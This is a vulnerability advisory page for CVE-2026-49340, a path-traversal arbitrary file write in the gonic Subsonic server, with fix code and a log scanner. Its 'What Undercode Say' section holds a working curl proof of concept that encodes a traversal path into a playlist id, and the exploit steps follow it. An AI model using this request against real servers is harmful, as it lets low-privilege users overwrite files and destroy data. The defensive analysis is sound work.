CVE-2026-49340 is a critical vulnerability in gonic, a free-software Subsonic server API implementation. Prior to version 0.21.0, a logic error in the `ServeCreateOrUpdatePlaylist` function allows any authenticated Subsonic user—including those without administrative privileges—to write playlist M3U content to an attacker-controlled absolute filesystem path on the gonic host.
The vulnerability is rooted in two distinct flaws:
- Unreachable guard clause: The function attempts to read an existing playlist using `c.playlistStore.Read(playlistPath)`. This function returns `(Playlist, nil)` on success and `(nil, err)` on any failure. However, the conditional check is `err != nil && pl != nil`, a condition that is impossible to satisfy. Consequently, the ownership check `playlist.UserID != 0 && playlist.UserID != user.ID` is bypassed, as `playlist` remains at its zero value, where `UserID = 0`.
- No path containment in `Store.Write`: The `Store.Write` function uses `filepath.Join(s.basePath, relPath)` to construct the destination path. Go's `filepath.Join` does not prevent directory traversal sequences like `..`. An attacker can therefore supply a relative path such as `../../etc/cron.daily/anything`, causing the file to be written outside the intended `playlists/` directory.
Furthermore, the `os.MkdirAll` call creates intermediate directories with world-writable `0o777` permissions, posing an additional hardening concern. This bug is independent of CVE-2026-49338 and CVE-2026-49339.
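Both flaws are addressed by failing closed. The Go code below is an added example written for this page; it is not gonic's own code and not the 0.21.0 patch. `SafeJoin` refuses any `relPath` that resolves outside the playlist directory (a check `filepath.Join` alone never performs), `Store.Write` creates parent directories with `0o750` instead of the world-writable `0o777`, and `AuthorizeWrite` is a reachable version of the ownership guard. The `Playlist` type, the `Store` struct and all function names are assumptions made for the example.

```go
package main

import (
	"errors"
	"fmt"
	"os"
	"path/filepath"
	"strings"
)

// Playlist is a minimal stand-in for a stored playlist record
// (constructed for this example; not gonic's type).
type Playlist struct {
	UserID int
	Name   string
}

var (
	ErrOutsideBase = errors.New("playlist path escapes the playlist directory")
	ErrForbidden   = errors.New("playlist is owned by another user")
)

// SafeJoin resolves relPath against basePath and refuses any result that is
// not strictly inside basePath. filepath.Join cleans ".." segments but will
// happily return a path outside basePath, which is the containment flaw
// described above. (Hypothetical helper, not gonic's code.)
func SafeJoin(basePath, relPath string) (string, error) {
	base, err := filepath.Abs(basePath)
	if err != nil {
		return "", err
	}
	if filepath.IsAbs(relPath) {
		return "", ErrOutsideBase
	}
	full := filepath.Join(base, relPath)
	rel, err := filepath.Rel(base, full)
	if err != nil {
		return "", err
	}
	// rel is "." for basePath itself and starts with ".." when full has
	// climbed out of basePath; both are rejected.
	if rel == "." || rel == ".." || strings.HasPrefix(rel, ".."+string(filepath.Separator)) {
		return "", ErrOutsideBase
	}
	return full, nil
}

// Store keeps playlist files beneath basePath.
type Store struct{ basePath string }

// Write stores data at relPath inside the playlist directory. Parent
// directories are created with 0o750 instead of the world-writable 0o777.
func (s Store) Write(relPath string, data []byte) error {
	full, err := SafeJoin(s.basePath, relPath)
	if err != nil {
		return err
	}
	if err := os.MkdirAll(filepath.Dir(full), 0o750); err != nil {
		return err
	}
	return os.WriteFile(full, data, 0o640)
}

// AuthorizeWrite is a reachable, fail-closed version of the ownership guard:
// a read error other than "not found" aborts the request, and an existing
// playlist owned by a different user is rejected.
func AuthorizeWrite(existing *Playlist, readErr error, userID int) error {
	if readErr != nil {
		if errors.Is(readErr, os.ErrNotExist) {
			return nil // no existing playlist: creating a new one is allowed
		}
		return readErr
	}
	if existing != nil && existing.UserID != 0 && existing.UserID != userID {
		return ErrForbidden
	}
	return nil
}

func main() {
	for _, p := range []string{"7/mix.m3u", "../../etc/cron.daily/anything", "/etc/passwd"} {
		full, err := SafeJoin("/srv/gonic/playlists", p)
		fmt.Printf("%-32q -> %q %v\n", p, full, err)
	}
}
```

The containment check is purely lexical: it stops `..` and absolute paths but says nothing about a symlink that already exists under the playlist directory. A deployment that needs that guarantee should resolve the final path with `filepath.EvalSymlinks` before writing, and in any case should run the process with write access to as little of the filesystem as possible.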
The issue was patched in version 0.21.0.
DailyCVE Form
Platform: Gonic
Version: < 0.21.0
Vulnerability: Arbitrary File Write
Severity: High (CVSS 8.1)
Date: 2026-06-19
Prediction: Already Patched (0.21.0)
What Undercode Say
```sh
# Encode a traversal path to a writeable location (e.g., /var/log/anything.log)
RAW='../../../var/log/anything.log'
ID="pl-$(printf '%s' "$RAW" | base64 -w0 | tr '/+' '_-')"
# Exploit the vulnerability via the createPlaylist endpoint
curl -s "http://gonic-host/rest/createPlaylist.view?u=lowpriv&p=pass&c=poc&v=1.16.1&f=json&id=$ID&name=injected"
```
Exploit
An attacker can exploit this by:
- Encoding a malicious path (e.g., `../../../var/log/anything.log`) into a Base64-encoded playlist ID.
- Sending a crafted request to the `/rest/createPlaylist.view` endpoint.
- The server, due to the unreachable guard and lack of path containment, writes the M3U playlist content to the attacker-specified path.
- The `os.MkdirAll` call creates any necessary parent directories with `0o777` permissions.
Protection
- Upgrade gonic: Immediately upgrade to version 0.21.0 or later.
- Restrict User Permissions: Review and limit write permissions for users to reduce exposure.
- Implement a Web Application Firewall: Deploy a WAF to block malicious traffic patterns.
- Active Monitoring: Utilize cybersecurity alerts to stay informed about potential threats.
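As an added example for the monitoring item above (not from the original page and not gonic's own tooling), the following Go scanner reads constructed access-log lines and flags `createPlaylist`/`updatePlaylist` requests whose playlist id decodes to a path that climbs out of the playlist directory. It assumes the `pl-` plus URL-safe base64 id layout used in the proof of concept above; the log lines, the `Finding` type and the function names are constructed for this example.

```go
package main

import (
	"encoding/base64"
	"net/url"
	"path"
	"strings"
)

// SampleLog is constructed access-log input for the scanner. The first line
// carries the proof of concept's encoded traversal id; the other two are benign.
var SampleLog = []string{
	`10.0.0.5 - - [19/Jun/2026:10:00:01 +0000] "GET /rest/createPlaylist.view?u=lowpriv&c=poc&v=1.16.1&f=json&id=pl-Li4vLi4vLi4vdmFyL2xvZy9hbnl0aGluZy5sb2c=&name=injected HTTP/1.1" 200 81`,
	`10.0.0.9 - - [19/Jun/2026:10:00:02 +0000] "GET /rest/createPlaylist.view?u=alice&c=app&v=1.16.1&f=json&name=roadtrip HTTP/1.1" 200 91`,
	`10.0.0.9 - - [19/Jun/2026:10:00:03 +0000] "GET /rest/ping.view?u=alice&c=app&v=1.16.1 HTTP/1.1" 200 40`,
}

// Finding is one request whose playlist id decodes to a path that would
// leave the playlist directory.
type Finding struct {
	Line    string
	Decoded string
}

// DecodePlaylistID reverses the "pl-" + URL-safe base64 id format used in the
// proof of concept above. The format is assumed from the PoC, not taken from
// gonic's source; adjust it to the id scheme your instance actually emits.
func DecodePlaylistID(id string) (string, bool) {
	raw := strings.TrimPrefix(id, "pl-")
	b, err := base64.URLEncoding.DecodeString(raw)
	if err != nil {
		// the PoC keeps "=" padding, but accept unpadded ids as well
		if b, err = base64.RawURLEncoding.DecodeString(raw); err != nil {
			return "", false
		}
	}
	return string(b), true
}

// IsTraversal reports whether a decoded id is absolute or climbs above the
// directory it would be joined onto.
func IsTraversal(p string) bool {
	if path.IsAbs(p) {
		return true
	}
	clean := path.Clean(p)
	return clean == ".." || strings.HasPrefix(clean, "../")
}

// ScanAccessLog returns a Finding for every createPlaylist/updatePlaylist
// request whose id (or Subsonic's playlistId) decodes to a traversal path.
func ScanAccessLog(lines []string) []Finding {
	var out []Finding
	for _, line := range lines {
		for _, tok := range strings.Fields(line) {
			if !strings.HasPrefix(tok, "/rest/createPlaylist") && !strings.HasPrefix(tok, "/rest/updatePlaylist") {
				continue
			}
			u, err := url.Parse(tok)
			if err != nil {
				continue
			}
			q := u.Query()
			id := q.Get("id")
			if id == "" {
				id = q.Get("playlistId")
			}
			if id == "" {
				continue
			}
			if decoded, ok := DecodePlaylistID(id); ok && IsTraversal(decoded) {
				out = append(out, Finding{Line: line, Decoded: decoded})
			}
		}
	}
	return out
}
```

A hit on a patched instance still matters as evidence of attempted abuse by an authenticated account, so the `u=` value in the same line is the next thing to look at. If gonic sits behind a reverse proxy, make sure the proxy logs query strings, since the indicator lives entirely in the `id` parameter.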
Impact
- Integrity: Any authenticated user can overwrite (truncate-and-rewrite) any file the gonic process has write access to. This includes gonic’s own SQLite database, configuration files, log files, cache, and audit trails.
- Availability: Overwriting `gonic.db` destroys all user state—accounts, ratings, playlists, etc.—in an unrecoverable manner.
- Filesystem State: `MkdirAll(dir, 0o777)` creates intermediate directories as world-writable, regardless of the umask.
- Trust Boundary: gonic explicitly supports a non-admin user role. This bug grants every non-admin user a destructive filesystem-write primitive.
Sources:
Reported By: github.com

